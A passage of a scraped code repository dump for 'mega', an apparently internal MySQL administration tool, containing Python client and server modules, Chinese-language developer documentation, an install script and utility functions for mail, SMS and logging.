资源池页面增加任务控制\n\t* 基本信息统计及报表\n\t\n###维护性功能\n* BUG 修复\n\t* 备份重复发起问题 2014-07-07 (时间临界点问题)\n\n\n###待完成功能\n* 需求,bug修复提交页面\n* 增加帮助页面,一般问题汇总,增加wiki链接\t" }, { "alpha_fraction": 0.570806086063385, "alphanum_fraction": 0.5991285443305969, "avg_line_length": 19.81818199157715, "blob_id": "787ee196aa8214d7a0fa8049398187cea061c15d", "content_id": "7a247930a290899ab6d48c5d70538d07b2c3476c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 459, "license_type": "no_license", "max_line_length": 44, "num_lines": 22, "path": "/src/mega_client/mega-1.0/mega_client/utils.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:mega_client.mega_client.utils\n'''\nimport socket as S\nfrom socket import socket,SOCK_DGRAM,AF_INET\n\ndef get_ip_address():\n myname=''\n myip=''\n try:\n myname = S.getfqdn(S.gethostname())\n myip = S.gethostbyname(myname)\n except:\n s = socket(AF_INET, SOCK_DGRAM)\n s.connect(('8.8.8.8', 0))\n myip=s.getsockname()[0] \n return myname,myip\n\n" }, { "alpha_fraction": 0.5735930800437927, "alphanum_fraction": 0.5930736064910889, "avg_line_length": 20.045454025268555, "blob_id": "78d483d07831d5b27ad006e73a158caaf7ee2dae", "content_id": "4fc0cee56a92488782dcd7551008eb5f689c3c79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 462, "license_type": "no_license", "max_line_length": 66, "num_lines": 22, "path": "/src/mega_service/slowlog/slow_log.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 16, 2014\n\n@author: xchliu\n\n@module:mega_service.slow_log\n'''\nfrom lib.PyMysql import PyMySQL\n\nclass SlowLog():\n\n def __init__(self):\n pass\n \n def get_slowlog_instance_list(self):\n sql=\"select * from instance where stat=1 and slowlog=1\"\n instance_list=PyMySQL().query(sql, type='dict').fetchall()\n if instance_list:\n return instance_list\n else:\n return []" }, { "alpha_fraction": 0.5193798542022705, "alphanum_fraction": 0.5736433863639832, "avg_line_length": 13.333333015441895, "blob_id": "42232cb0ca241ccf85f73a0b393bffa462c269db", "content_id": "ee13770809b06cb618cf1409076ce9f7e8a7f7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 28, "num_lines": 9, "path": "/src/mega_client/mega_client/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 21, 2014\n\n@author: xchliu\n\n@module:mega_client.__init__\n'''\n__all__=['sender','utils']\n" }, { "alpha_fraction": 0.6399284601211548, "alphanum_fraction": 0.6634088158607483, "avg_line_length": 29.736263275146484, "blob_id": "da01586f4a7d9172e13d71112a3c5416c2ca3730", "content_id": "6db81306cb94c89cf2df08c119c8841d721312a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11212, "license_type": "no_license", "max_line_length": 138, "num_lines": 273, "path": "/docs/wydba.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#wy python 公用库\n\n##功能点\n\n### 数据库连接\n\t* conn mysql 连接\n### 邮件发送\n\t* sendmail \n\t\n### mega client\n\t\n* logs\tmega 客户端日志,调用后日志可打入client日志:/var/log/mega/mega_client.log\n* sender mega 交互类,可调用服务端提供的api接口\n* utils 工具类,包含各种通用性工具\n\n\n##开发规范\n\t* 统一开发规范\n\t* 接口调用规范\n###接口函数\n获取mega service 支持的接口函数列表,使用下面的代码:\n\t\n\t>>> from mega_client import sender\n\t>>> c=sender.MegaTool()\n\t>>> c.get_all_funcs()\n\n安全考虑,上面的代码只能在mega service 所在服务器可获取有效列表,其他节点返回列表为空。\n\n>输出内容格式:\n\n>* 接口函数名称,用于后续调用指定\n\n>* 参数定义:\n\n>\t* args 为定义参数\n\n>\t* varargs 不定无名参数,即存在定义参数*args\n\n>\t* keywords\t不定有名参数,即存在定义参数**kwargs\n> * defaults 默认值,tuple形式,对应args中每一个参数的默认值,None为无默认值\n\n目前支持的接口参数:\n\nupdate:2014-10-10\n\n1. add_database ArgSpec(args=['ip', 'port', 'db'], varargs=None, keywords='args', defaults=None)\n2. add_instance ArgSpec(args=['ip', 'port'], varargs=None, keywords='args', defaults=None)\n3. add_server ArgSpec(args=['ip'], varargs=None, keywords='args', defaults=None)\n4. add_slow_log ArgSpec(args=['log_info'], varargs=None, keywords=None, defaults=None)\n5. backup_routine ArgSpec(args=['time'], varargs=None, keywords='args', defaults=(None,))\n6. client_ping ArgSpec(args=['ip', 'version'], varargs=None, keywords='args', defaults=(None,))\n7. client_upgrade ArgSpec(args=['host_list'], varargs=None, keywords=None, defaults=(None,))\n8. del_database ArgSpec(args=['ip', 'port', 'db'], varargs=None, keywords=None, defaults=None)\n9. del_instance ArgSpec(args=['ip', 'port'], varargs=None, keywords=None, defaults=None)\n10. del_server ArgSpec(args=['ip'], varargs=None, keywords=None, defaults=None)\n11. failover ArgSpec(args=['group_name', 'old_master', 'new_master', 'method', 'time'], varargs=None, keywords=None, defaults=None)\n12. get_all_backup ArgSpec(args=[], varargs=None, keywords=None, defaults=None)\n13. get_all_db ArgSpec(args=['model', 'stat', 'count'], varargs=None, keywords=None, defaults=(None, 0, 0))\n14. get_all_instance ArgSpec(args=['model', 'stat', 'count', 'role'], varargs=None, keywords=None, defaults=(None, 0, 0, None))\n15. get_all_server ArgSpec(args=['model', 'stat', 'count'], varargs=None, keywords=None, defaults=(None, 0, 0))\n16. get_database ArgSpec(args=['model', 'ip', 'port', 'db'], varargs=None, keywords=None, defaults=(None, None, 3306, None))\n17. get_instance ArgSpec(args=['model', 'ip', 'port'], varargs=None, keywords=None, defaults=(None, None, 3306))\n18. get_server ArgSpec(args=['model', 'ip'], varargs=None, keywords=None, defaults=(None, None))\n19. main ArgSpec(args=[], varargs=None, keywords=None, defaults=None)\n20. mod_database ArgSpec(args=['ip', 'port', 'db'], varargs=None, keywords='args', defaults=None)\n21. mod_instance ArgSpec(args=['ip', 'port'], varargs=None, keywords='args', defaults=None)\n22. mod_server ArgSpec(args=['ip'], varargs=None, keywords='args', defaults=None)\n23. remote_cmd ArgSpec(args=['ip', 'port', 'cmd', 'cmd_type', 'task_id', 'args'], varargs=None, keywords=None, defaults=(None, None))\n24. report_routine ArgSpec(args=['time'], varargs=None, keywords=None, defaults=(None,))\n25. slowlog_pack ArgSpec(args=['sql'], varargs=None, keywords=None, defaults=None)\n26. slowlog_routine ArgSpec(args=['time'], varargs=None, keywords=None, defaults=(None,))\n27. slowlog_statics ArgSpec(args=['time'], varargs=None, keywords=None, defaults=(None,))\n28. slowlog_statics_per_hour ArgSpec(args=['v_time'], varargs=None, keywords=None, defaults=None)\n29. task_log ArgSpec(args=['task_id', 'start_time', 'end_time', 'stat', 'redo', 'comment'], varargs=None, keywords=None, defaults=(0, ''))\n30. update_backupinfo ArgSpec(args=['task_info', 'action'], varargs=None, keywords=None, defaults=('INSERT',))\n\n###模块调用:\n\nmega client 在安装或者升级时会将公用库放到该环境的python site package 中,使用时直接import 即可。 提供的公用库:\n\n* sender\n* logs\n* setting\n* utils\n\t* sendmail\n\t* get_ip_address\n\n####sender\nsender 为客户端与服务端核心交互模块,负责所有的数据发送。其中包含2个类:\n\n* MegaClient mega 客户端发送类,负责对数据包的检查,封装,与服务端的通信,数据包的拆包等操作\n* MegaTool\t 管理类,目前只包含一个函数,就是上面获取所有接口函数的函数\n\n#####MegaClient\n其中有2个常量:\n \n\tHOST = 'localhost'\n\tPORT = 1104\n默认情况下,sender会向本地1104端口发送请求数据,因此在其他节点获取所有接口函数列表或者其他操作都会连接失败,返回空列表。可以通过加上HOST参数来解决:\n\n\t>>> from mega_client import sender\n\t>>> from mega_client.setting import MEGA_HOST\n\t>>> cmd='get_all_instance'\n\t>>> c=sender.MegaClient(host=MEGA_HOST,cmd=cmd)\n\t>>> c.run(func_args=\"model='backup',stat=1,role=1\",CYCLE=1)\n\t>>> c.close()\n**MegaClient.run** 参数说明\n\n这里存在2层调用处理:\n\n1. 当前代码对MegaClient类的调用\n2. 在服务端对指定函数(cmd定义的函数名称)的调用\n\n所以`run`函数需要处理自己的参数,也要接收目标函数的参数。函数的定义:\n\n\tdef run(self,func_args=None,**args): \n* func_args 就是目标函数的调用参数,比如上面的func_args=\"model='backup',stat=1,role=1\",这些其实会传递给服务端的接口函数get_all_instance。\n* **args 为run函数自己的运行参数,将作为客户端节点发送到服务端数据包的属性,目前会被解析的参数:\n\n\t\t_item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n\t keys:\n * TYPE: 0 internal server task,1 remote task\n * VALUE: func name which be called\n * TIME: when to do : 0 once , relay to the CYCLE\n CYCLE: lifecycle of job day,week,month\n TARGET: unique identify for server or instance or database. \n unique command type when in the case used for remote command etc.\n *cmd\n *python\n *bash\n ARGS: args for the api func\n TOOL: Internal func calls\n一般情况下,使用正常调用即可,不需要指定上面的参数,列出来是为了避免指定同名参数造成异常。以及一些确实需要改变请求动作的特殊情况。\n\n**返回结果**\n\n如果有返回结果,run函数会直接返回,返回内容为UTF8 编码的字符串,但格式一般都已经处理为list,对结果做eval()处理后即\n可使用,不在sender完成对象转换有2个考虑:\n\n1. 多语言调用,后续可实现通过命令行进行接口调用\n2. 避免数据丢失\n\n####logs\n提供一个简单的日志类,能满足一般的日志需求。如果涉及handler ,level,切分等自定义,还是建议调用logging库来实现。\n\n调用实例:\t\n\n\t>>> import mega_client.logs\n\t>>> log=logs.Logger('test').log()\n\t>>> log.info('test')\n其中Logger在初始化的时候如果参数logfile=None被赋值,返回的log对象会将日志打到指定文件中。\n\n默认情况下,level为DEBUG,输出路径为/var/log/mega/mega_client.log,日志格式为一般通用日志格式。\n####setting\n\n客户端的配置文件放到公用库的目的是提供部分全局信息:\n\n\tCLIENT_DIR = '/home/mysql/'\n DAEMON_LOG = '/var/log/mega/mega_client.log'\n DAEMON_PID = '/var/run/mega_client.pid'\n DEAFULT_LOG_DEBUG = True\n DEFAULT_TARGET = 'cmd'\n KEEPALIVE = 300\n LOG_FILE_NAME = '/var/log/mega/mega_client.log'\n MEGA_HOST = '172.17.62.37'\n SCRIPT_DIR = '/home/mysql/admin/mega_client/script/'\n SERVICE_PID = '/var/run/mega_client_srv.pid'\n TCP_HOST = ''\n TCP_PORT = 1105\n version = 'mega-client 0.1'\t\t\t\n\n后续将实现客户端去服务器读取配置,如keepalived 监测周期,版本信息,访问本地数据库的账号密码等。\n\n####utils\n\nget_ip_address()获取本地hostname及ip地址。\n\n\n##维护相关\n###客户端安装\n\n初始化客户流程:\n\n* 拷贝客户端安装包到目标服务器:/home/xdba/\n* root执行安装脚本:\n\n\t\tsudo bash install.sh \n客户端代码层级:\n\t\n\t\t.\n\t\t├── PKG-INFO\n\t\t├── build\n\t\t│   └── lib\n\t\t│   └── mega_client\n\t\t│   ├── __init__.py\n\t\t│   ├── client_main.py\n\t\t│   ├── listener.py\n\t\t│   ├── logs.py\n\t\t│   ├── mega_client.py\n\t\t│   ├── sender.py\n\t\t│   ├── setting.py\n\t\t│   ├── setup.py\n\t\t│   ├── utils.py\n\t\t│   └── worker.py\n\t\t├── install.sh\n\t\t├── mega_client\n\t\t│   ├── __init__.py\n\t\t│   ├── client_main.py\n\t\t│   ├── listener.py\n\t\t│   ├── logs.py\n\t\t│   ├── mega_client.py\n\t\t│   ├── sender.py\n\t\t│   ├── setting.py\n\t\t│   ├── setup.py\n\t\t│   ├── utils.py\n\t\t│   └── worker.py\n\t\t└── setup.py\n\n###客户端升级\n\n客户端实现自动化升级,完成代码迭代。\n\n升级脚本:/mega_client/script/upgrade.py\n\n* 升级发起方式\n\t* mega服务端任务推送\n\t* mega客户端发起请求\n\t\n* 升级流程\t\n\t* 服务端:在目录/mega/mega_client/中执行命令产生最新client 安装包:\n\t\n\t\t\tpython setup.py sdist\n\t\t\ttar zxvf dist/mega-1.0.tar.gz\n\n\t* 客户端:完成本地环境检查和升级准备工作:upgrade.py:Upgrade._get_pag()\n\t\t\n\t* 客户端:调用本地client 中sender 模块,向服务器发送升级请求:\n\t\t\t\n\t\t self.cmd='client_upgrade'\n \t\tself.c=MegaClient(host='172.17.62.37',cmd=self.cmd)\n\t\t\tpag=self.c.run(func_args=ip,TOOL=True)\n\t* 服务端:解析数据包后,调用api中接口:\n\n\t\t\t2014-07-31 14:13:07 API-tool DEBUG Receive upgrade request: ['192.168.199.245']\n\t\t\t2014-07-31 14:13:07 Worker DEBUG Call API: apis.client_upgrade(['192.168.199.245'])\n\t\t\n\t* 服务端:在目录/mega_client/dist/中获取代码包,遍历目录文件,返回包含所有代码数据的[]\n\t\t\t\t \n\t\t\t_pag.extend(read_file(_prefix,_prefix))\n \treturn _pag\n\t* 客户端:\n\t\t* 接收返回数据,还原代码包到临时目录:/tmp/\n\t\t* python package安装:\n\t\t\t\t\n\t\t\t\tpython /tmpdir/setup.py install\n\t\t* 代码包替换,将本地服务包运行包替换为新代码包,默认本地服务运行路径:/home/xdba/\n\n\t\t\t\tcp -ar tmpdir clientdir\n\t\t* 重启client 服务:\n\t\t\t\t\t\n\t\t\t\tpython /etc/init.d/mega_client restart\t\n* 操作流程\n\t* 确认服务端/mega_client/dist/ 目录有存在有效代码包:\n\t\t\n\t\t\t[xchliu@xchliu dist]$ ls\n\t\t\tmega-1.0 mega-1.0.tar.gz\n\t* 调度升级 \n\t\t* 服务器端配置调度任务,进行客户端升级\n\n\t\t\t<a href=\"http://172.17.61.63:8080/admin/client\">mega任务调度</a>\n\t\t* 客户端运行升级脚本,进行单点升级:\n\n\t\t\t\tpython upgrade.py" }, { "alpha_fraction": 0.6299483776092529, "alphanum_fraction": 0.6419965624809265, "avg_line_length": 25.31818199157715, "blob_id": "2225fb2147b4934f24408850d4b0277323694310", "content_id": "250ec5c0f15f768dd11a80e89a0face4dedf95eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 117, "num_lines": 44, "path": "/src/apis/task.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:apis.task\n'''\n\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\ntry:\n from mega_client.sender import MegaClient\nexcept:\n from mega_client.mega_client.sender import MegaClient\n\n\nMODEL='API-task'\nlog=Logger(MODEL).log()\n\n\ndef remote_cmd(ip,port,cmd,cmd_type,task_id=None,args=None):\n '''\n ip port:instance info\n cmd :task name or the script name\n cmd_type: python,shell,cmd\n args: for script\n '''\n if task_id and args:\n args=str(task_id)+\" \"+ args\n c=MegaClient(host=ip,port=1105,cmd=cmd)\n result=c.run(func_args=args,TARGET=cmd_type)\n log.debug(\"result for %s@%s:%s\" %(cmd,ip,result))\n return result\n\ndef task_log(task_id,start_time,end_time,stat,redo=0,comment=''):\n value=(task_id,start_time,end_time,stat,redo,comment)\n sql=\"insert into task_log(task_id,start_time,end_time,stat,redo,comment) values(%s,'%s','%s',%s,%s,'%s')\" % value\n log.debug(sql)\n result,ex=PyMySQL().execute(sql)\n if not result:\n log.error(\"Save task log failed as :%s\" % ex)\n return (0,ex)\n return 1\n " }, { "alpha_fraction": 0.4890387952327728, "alphanum_fraction": 0.5649241209030151, "avg_line_length": 15.971428871154785, "blob_id": "f986763957f181c536d8e2ff4dfb272ebcf2b997", "content_id": "4a6cf9361c8f18c01337251c788f9cbca8e0aafa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 42, "num_lines": 35, "path": "/src/tests/slow_log.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 15, 2014\n\n@author: xchliu\n'''\nimport unittest\nimport sys\nsys.path.append(\"..\")\n\nfrom mega_service.sender import MegaClient\n\nvar='''\n {'db_host': '127.0.0.1',\n 'port': 3306,\n 'start_time':'0000-00-00 00:00:00',\n 'user':'xchliu',\n 'user_host':'127.0.0.1',\n 'query_time': 20,\n 'lock_time':12,\n 'rows_sent':21,\n 'rows_examined':22,\n 'sql_text':'select 1',\n 'sql_explained':\"{test:test}\"\n}\n'''\n\ndef test_add_slowlog():\n cmd='add_slow_log'\n c=MegaClient(cmd=cmd)\n print c.run(var) \n\n\n\nif __name__ == \"__main__\":\n test_add_slowlog()" }, { "alpha_fraction": 0.6898733973503113, "alphanum_fraction": 0.702531635761261, "avg_line_length": 30.66666603088379, "blob_id": "d0b6272a3971433353df15a71264d2d22df9c41a", "content_id": "3b74ed894c5cb318de41ec096dc391096902267c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 121, "num_lines": 15, "path": "/src/mega_client/mega-1.0/script/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.upgrade\n'''\n\n__doc__=\"\"\"\n scripts used for client func invoking\n all the scripts here can/should use the public mega_client module instead of import the private path \n \n in fact,scripts will be called in the command line by the worker class,\n and the exit error code and standard output will be logged and used to verdict whether the task runs successfully\n\"\"\"" }, { "alpha_fraction": 0.5864432454109192, "alphanum_fraction": 0.5925361514091492, "avg_line_length": 29.534883499145508, "blob_id": "bc08dbb634c64b85e099fbd468994aa1575c605d", "content_id": "86862800a818ecfd2376f22421b5470c60a2eeb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1313, "license_type": "no_license", "max_line_length": 145, "num_lines": 43, "path": "/src/mega_web/entity/models.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on May 9, 2014\n\n@author: xchliu\n'''\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"mega_web.settings\")\nfrom entity import *\nfrom report import * \nfrom lib.PyMysql import PyMySQL\n\ndef raw_as_qs(Table,raw_query, params=()):\n \"\"\"Execute a raw query and return a QuerySet. The first column in the\n result set must be the id field for the model.\n :type raw_query: str | unicode\n :type params: tuple[T] | dict[str | unicode, T]\n :rtype: django.db.models.query.QuerySet\n \"\"\"\n cursor = connection.cursor()\n try:\n cursor.execute(raw_query, params)\n return Table.objects.filter(id__in=(x[0] for x in cursor))\n finally:\n cursor.close()\n\nclass Alert():\n \n def __init__(self,data):\n self.target=data.get('target')\n self.model=data.get('model')\n self.stat=data.get('stat',0)\n self.level=data.get('level',1)\n self.msg=data.get('msg','')\n self.q=PyMySQL()\n \n def add_alert(self):\n if not self.msg:\n return False\n sql=\"insert into alert(target,model,stat,level,msg) values('%s','%s',%s,%s,'%s')\" %(self.target,self.model,self.stat,self.level,self.msg)\n return self.q.execute(sql)\n \n def get_alert(self):\n pass " }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 28.714284896850586, "blob_id": "9159ed898fef3733886e472de0d4a2317ad26255", "content_id": "d18bb2574f54094c195baebfe3a796c5cb29b5e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 84, "num_lines": 7, "path": "/src/scripts/install.sh", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#used to install application\n\nPROJECT=mega\nchmod a+x /export/servers/app/mega/src/mega_service/mega_server.py\nln -sf /export/servers/app/mega/src/mega_service/mega_server.py /etc/init.d/$PROJECT\n" }, { "alpha_fraction": 0.54786217212677, "alphanum_fraction": 0.5634971261024475, "avg_line_length": 28.02777862548828, "blob_id": "1fd16fc14a774ce381228410fb1b077ae001107f", "content_id": "37fe0a0951a4d19969593963a5a67722e4da7ec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3134, "license_type": "no_license", "max_line_length": 101, "num_lines": 108, "path": "/src/lib/utils.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import re\nimport time\nimport datetime\nfrom email import Utils\nfrom email.mime.text import MIMEText\nfrom email import Header\nimport smtplib\nimport httplib\n\nfrom conf.settings import EMAIL_SERVER,SMS_SERVER\n\ndef check_ip(ip):\n '''\n check the ip address is correct or not\n '''\n result=False\n if ip:\n ip_match = re.match('((2[0-4]\\d|25[0-5]|[01]?\\d\\d?)\\.){3}(2[0-4]\\d|25[0-5]|[01]?\\d\\d?$)',ip) \n if ip_match:\n result=True\n return result\ndef is_int(value):\n try:\n if not isinstance(int(value),int):\n return False\n except:\n return False\ndef today(day=None,format=None):\n '''\n if day is given ,return the date N(day) days ago \n else is today\n '''\n if not format:\n format='%Y-%m-%d'\n if day:\n return (datetime.datetime.now()-datetime.timedelta(days=day)).strftime(format)\n else:\n return datetime.datetime.today().strftime(format)\n\ndef now(format=None):\n '''\n return current time \n '''\n if not format:\n format='%Y-%m-%d %X'\n return time.strftime(format, time.localtime())\n \nclass SendMail():\n '''\n A mail send client in HTML.\n Args:\n subject: subject;\n content: Content in HTML;\n temail: A list() of Recipients;\n femail: sender address, default is '[email protected]';\n priority: priority\n \n Useage:\n import utils\n s=utils.SendMail('test')\n subject = \"Test mail from 172.17.58.25\"\n content = \"<H1>Test</H1>\"\n temail = (\"[email protected]\",)\n s.sendmail(subject, content, temail)\n '''\n \n DEFAULT_FEMAIL='[email protected]'\n DEFAULT_PRIORITY=\"3\"\n \n def __init__(self,module):\n self.module=module\n \n def sendmail(self,subject,content,temail,femail=DEFAULT_FEMAIL,priority=DEFAULT_PRIORITY):\n# log.debug(\"Get mail task : %s for %s\" % (subject,self.module))\n if len(str(subject))*len(content)*len(temail) == 0:\n return False,'illegal argument!'\n mime = MIMEText(content,'html', 'utf-8')\n mime['To'] = \", \".join(temail)\n mime['From'] = femail\n mime['Subject'] = Header.Header(subject,'utf-8')\n mime['X-Priority'] = priority\n mime['Date'] = Utils.formatdate(localtime = 1)\n try:\n s = smtplib.SMTP(EMAIL_SERVER)\n s.sendmail(femail, temail, mime.as_string())\n# log.info(\"Mail task:%s %s :%s\" % (self.module,subject,temail))\n return True,''\n except smtplib.SMTPException, se:\n return False,se\n# log.error(se)\n \ndef sms(to_mail,msg):\n '''\n to_mail: 1111,222,333\n msg: 'test'\n '''\n if not to_mail or not msg:\n return False\n url=\"http://%s:%s/sms.php?phone=%s&sms=%s\" % (SMS_SERVER[0],SMS_SERVER[1],to_mail,msg)\n try:\n conn=httplib.HTTPConnection(SMS_SERVER[0],port=SMS_SERVER[1])\n conn.request('GET', url)\n response=conn.getresponse()\n if response.getheaders():\n return True\n except Exception as ex:\n# log.error(ex)\n return False" }, { "alpha_fraction": 0.6004887223243713, "alphanum_fraction": 0.61331707239151, "avg_line_length": 26.299999237060547, "blob_id": "0637aade1885f3e0f0a4fa4ed87aae4469d1ed7c", "content_id": "61a8b8ce57c917c47270e87a012be40cfd12ab97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1637, "license_type": "no_license", "max_line_length": 81, "num_lines": 60, "path": "/src/apis/alert.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 24, 2014\n\n@author: xchliu\n\n@module:apis.alert\n'''\nimport sys\nsys.path.append('/Users/xchliu/Documents/workspace/mega/src')\n\n\nimport datetime\nfrom lib.logs import Logger\nfrom lib.utils import today\nfrom mega_web.console.backup import Backup \nfrom mega_web.entity.models import Alert\n\nMODEL='API-Alert'\nlog = Logger(MODEL).log()\n\ndef alert_routine_hour(time=None):\n '''\n must be called only once in an hour \n '''\n if not time:\n time=datetime.datetime.now().strftime('%H:%M')\n hour,minite=time.split(':') \n #backup\n backup=Backup()\n failed_backup=backup.get_failed_backup(time)\n #only check once per day for daily task \n if int(hour)==9:\n uninvoked_backup=backup.get_uninvoked_backup(today(1))\n unaviable_backup=backup.get_unavailable_backup()\n pack_alert('backup',uninvoked_backup,level=1,stat=0,head='uninvoked backup:')\n pack_alert('backup',unaviable_backup,level=1,stat=0,head='unaviable backup:')\n pack_alert('backup',failed_backup,level=1,stat=0,head='failed backup:')\n\ndef pack_alert(model,data,level=1,stat=0,head=''):\n if not data or not model:\n return\n result={\n 'target':None,\n 'model':model,\n 'level':level,\n 'stat':stat,\n 'msg':None\n }\n for d in data:\n result['target']=':'.join([str(x) for x in d[1:3]])\n result['msg']=head+'-'.join([str(x) for x in d[3:-1]])\n res,ex=Alert(result).add_alert()\n if not res:\n log.warn(ex)\n\ndef main():\n alert_routine_hour()\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6340852379798889, "alphanum_fraction": 0.6566416025161743, "avg_line_length": 19, "blob_id": "f57e68a0ea3a265df45a714a975811d10e663227", "content_id": "13d765c0390ec421d459103309fd0bdbbf3bb852", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 399, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/src/mega_web/lib/paginator.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n\n@module:mega_web.lib.paginator\n'''\n\nfrom django.core.paginator import Paginator\n\ndef paginator(object,page_num=1):\n result={}\n if not object:\n return result\n p=Paginator(list(object),15)\n result['pages']=p.num_pages\n result['page_range']=p.page_range\n result['page_data']=p.page(page_num)\n return result" }, { "alpha_fraction": 0.6044142842292786, "alphanum_fraction": 0.6298811435699463, "avg_line_length": 15.857142448425293, "blob_id": "e38787d48ffce16eec447c39598e2c28e897cc13", "content_id": "f8711fa77a5cc39a3cb2f17d2691cb3486ff36e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 589, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/src/mega_service/mega.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 1, 2014\n\n@author: xchliu\n\n@module:mega_service.mega\n'''\nimport sys\ntry:\n from mega_client.sender import MegaClient\nexcept:\n from mega_client.mega_client.sender import MegaClient\n \ndef sync_file(host='localhost'):\n cmd='sync_file'\n c=MegaClient(host,port=1105,cmd=cmd)\n c.run()\n\n\ndef client_update(host='localhost'):\n \n cmd='upgrade.py'\n c=MegaClient(host,port=1105,cmd=cmd)\n return c.run(TARGET='python',TYPE=1)\n \n\n\ndef main():\n #sync_file()\n client_update()\n return\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.529026985168457, "alphanum_fraction": 0.5437448620796204, "avg_line_length": 30.35897445678711, "blob_id": "84a220fb223650be43c508f6f9e232367b64d197", "content_id": "9793b01b8dd09004256d1d44a96a376f68854aef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1223, "license_type": "no_license", "max_line_length": 89, "num_lines": 39, "path": "/src/mega_client/mega_client/logs.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import logging\ntry:\n from setting import DEAFULT_LOG_DEBUG\n from setting import LOG_FILE_NAME\nexcept:\n DEAFULT_LOG_DEBUG=False\n LOG_FILE_NAME='/tmp/mega_client.log'\n\n\nclass Logger:\n def __init__(self,model,logfile=None):\n if DEAFULT_LOG_DEBUG :\n self.level=0\n else:\n self.level=3\n if logfile:\n self.logfile=logfile\n else:\n self.logfile=LOG_FILE_NAME\n self.model=model\n def log(self):\n LEVELS = {0: logging.DEBUG,\n 3: logging.INFO,\n 2: logging.WARNING,\n 1: logging.ERROR}\n level=LEVELS.get(self.level,logging.NOTSET) \n logging.basicConfig(level=level,\n filename=self.logfile,\n datefmt='%Y-%m-%d %H:%M:%S',\n format='%(asctime)s %(name)-12s %(levelname)-5s %(message)s')\n logger=logging.getLogger(self.model)\n #handler = logging.handlers.RotatingFileHandler(\n # self.logfile, maxBytes=1024*1024, backupCount=5) \n #logger.addHandler(handler)\n return logger\n\nif __name__==\"__main__\":\n log=Logger('test').log()\n log.error(\"error\")\n" }, { "alpha_fraction": 0.6747331023216248, "alphanum_fraction": 0.7003558874130249, "avg_line_length": 22.04918098449707, "blob_id": "d2b52dd2caf72ff9303cf9c24cfc4addd585002a", "content_id": "96fc54b76ae6533289334e8fc1e78e741aefeeea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1409, "license_type": "no_license", "max_line_length": 84, "num_lines": 61, "path": "/src/conf/GlobalConf.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\nimport socket\n#bool\nif socket.gethostname() == \"xchliu.lan\":\n DEBUG = True\nelse:\n DEBUG = False\nDEV=DEBUG\n#log\nDEAFULT_LOG_DEBUG=DEBUG\n#Service\nDEFAULT_TCP_PORT=1104\nDEFAULT_TCP_HOST='0.0.0.0'\nTCP_HEADER={'HEAD':'MEGA'}\n\n#default 